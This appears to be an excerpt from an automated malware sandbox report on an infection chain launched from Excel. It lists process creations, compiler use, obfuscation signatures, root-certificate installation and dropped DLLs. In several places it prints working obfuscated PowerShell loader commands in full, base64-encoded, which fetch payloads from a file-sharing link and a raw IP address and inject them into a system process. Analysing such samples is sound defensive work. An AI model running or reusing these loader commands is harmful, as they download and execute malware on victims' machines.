Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda

Compiles C# or VB.Net code

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.cmdline"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.cmdline"

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_000007FE899D51F8 push ds; ret	8_2_000007FE899D5242
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_000007FE899D022D push eax; iretd	8_2_000007FE899D0241
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_000007FE899D00BD pushad ; iretd	8_2_000007FE899D00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_000007FE899D5813 push ebx; ret	8_2_000007FE899D583A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_000007FE899D580D push ecx; ret	8_2_000007FE899D5812
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_000007FE899D583B push esp; ret	8_2_000007FE899D585A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_000007FE89AA096D pushad ; ret	8_2_000007FE89AA0991
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_0041E922 push es; retf	27_2_0041E926
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_004032D0 push eax; ret	27_2_004032D2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00401BD8 pushad ; ret	27_2_00401BDC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_004163F3 push edi; retf	27_2_004164AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00416390 push cs; iretd	27_2_004163C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00416393 push cs; iretd	27_2_004163C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00404C4C push ebx; retf	27_2_00404CDD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00416453 push edi; retf	27_2_004164AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00404C65 push ebx; retf	27_2_00404CDD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00416438 push edi; retf	27_2_004164AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00423594 pushfd ; retf	27_2_00423595
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00414616 push ebp; ret	27_2_00414631
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00414623 push ebp; ret	27_2_00414631
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00418E31 push FFFFFFF1h; ret	27_2_00418E3C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_0041E6A0 pushfd ; ret	27_2_0041E6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_0041EF45 push edi; retf	27_2_0041EF5F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_0041EF53 push edi; retf	27_2_0041EF5F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_0040CFAF push esp; retf	27_2_0040CFB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A7DFA1 push ecx; ret	27_2_00A7DFB4

Persistence and Installation Behavior

Installs new ROOT certificates

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob

Contains functionality for execution timing, often used to detect debuggers

Drops PE files

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.dll			Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
